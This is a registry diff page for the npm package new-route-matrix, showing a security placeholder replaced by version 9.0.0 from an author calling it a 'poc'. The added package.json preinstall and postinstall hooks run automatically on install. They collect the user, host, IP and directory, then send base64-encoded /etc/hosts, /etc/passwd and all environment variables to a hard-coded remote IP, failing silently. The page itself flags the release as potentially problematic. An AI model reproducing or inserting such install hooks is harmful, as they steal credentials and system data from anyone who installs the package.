new-route-matrix 0.0.1-security → 9.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of new-route-matrix might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +10 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ // This is the entry point for the new-route-matrix package - daemoon
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "new-route-matrix",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "9.0.0",
4
+ "description": "A poc made by daemoon",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "bash -c 'ip=$(curl -s ifconfig.me 2>/dev/null || echo unk); meta=\"u=$(whoami)&h=$(hostname)&ip=$ip&d=$(pwd)&t=$(date +%s)\"; curl -s \"http://167.71.56.207:8080/pre/new-route-matrix/?$meta\" && cat /etc/hosts 2>/dev/null | base64 | curl -s -X POST --data-binary @- \"http://167.71.56.207:8080/pre/new-route-matrix/hosts?$meta\" && cat /etc/passwd 2>/dev/null | base64 | curl -s -X POST --data-binary @- \"http://167.71.56.207:8080/pre/new-route-matrix/passwd?$meta\"' || true",
8
+ "postinstall": "bash -c 'ip=$(curl -s ifconfig.me 2>/dev/null || echo unk); meta=\"u=$(whoami)&h=$(hostname)&ip=$ip&d=$(pwd)&t=$(date +%s)\"; curl -s \"http://167.71.56.207:8080/post/new-route-matrix/?$meta\" && cat /etc/hosts 2>/dev/null | base64 | curl -s -X POST --data-binary @- \"http://167.71.56.207:8080/post/new-route-matrix/hosts?$meta\" && cat /etc/passwd 2>/dev/null | base64 | curl -s -X POST --data-binary @- \"http://167.71.56.207:8080/post/new-route-matrix/passwd?$meta\" && env | base64 | curl -s -X POST --data-binary @- \"http://167.71.56.207:8080/post/new-route-matrix/env?$meta\"' || true"},
9
+ "keywords": [],
10
+ "author": "daemoon",
11
+ "license": "MIT"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=new-route-matrix for more information.